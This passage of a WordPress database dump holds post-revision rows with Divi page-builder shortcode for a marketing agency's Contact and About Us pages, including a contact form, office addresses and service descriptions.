header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-07 21:02:05','2020-08-07 21:02:05','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/396-revision-v1/',0,'revision','',0),(657,1,'2020-08-08 12:55:20','2020-08-08 12:55:20','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map address=\"B-53/2, Naraina Vihar, New Delhi - 110028, Ind\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"4.5.2\" child_filter_saturate=\"30%\" hover_enabled=\"0\"][et_pb_map_pin pin_address=\"Oakland, CA, USA\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"3.0.78\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 12:55:20','2020-08-08 12:55:20','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(660,1,'2020-08-08 18:48:58','2020-08-08 18:48:58','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" 